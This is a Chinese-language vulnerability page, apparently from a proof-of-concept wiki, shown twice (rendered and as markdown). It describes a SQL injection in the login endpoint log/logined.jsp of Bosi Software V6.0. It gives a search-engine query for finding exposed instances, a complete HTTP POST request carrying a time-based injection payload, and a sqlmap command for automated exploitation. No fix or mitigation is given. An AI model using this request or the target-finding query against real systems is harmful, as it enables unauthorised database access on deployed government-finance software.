fofamini-wiki

登录白背景

源码

博斯软件V6.0 存在 sql 注入

一、漏洞简介

福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。

二、影响版本

博斯软件V6.0

三、资产测绘

hunterweb.title:"欢迎使用博斯软件"
特征

四、漏洞复现

POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--

sqlmap

POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-2

sqlmap -r 1.txt --batch --level 3 --thread 5

原文: https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg

# 博斯软件V6.0 存在 sql 注入

# 一、漏洞简介
福建博思软件股份有限公司博斯软件V6.0 log/logined.jsp存在SQL注入漏洞。

# 二、影响版本

- 博斯软件V6.0

# 三、资产测绘

- hunter`web.title:"欢迎使用 博斯软件"`
- 特征

![image.png](./img/qesLgT3zkCECCWG7/1697813092548-472a2527-ceb8-41ff-874b-32ce4c0e7ebe-375033.png)

# 四、漏洞复现
```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-1';WAITFOR DELAY '0:0:5'--
```
![image.png](./img/qesLgT3zkCECCWG7/1697813144963-54dfd143-ad16-466e-accc-847ad43268c6-781415.png)
sqlmap
```java
POST /log/logined.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONID=80D835813F9733E867790648CBAA0EC6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 106
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4298.0 Safari/537.36
Host: xx.xx.xx.xx
Connection: Keep-alive

Submit=-1A&account=-1password=g-2
```
```java
sqlmap -r 1.txt --batch --level 3 --thread 5
```
![image.png](./img/qesLgT3zkCECCWG7/1697813586437-c2b66328-c97f-4130-b663-8b4fe9ae5e07-762265.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zprm44mso2ysykrg>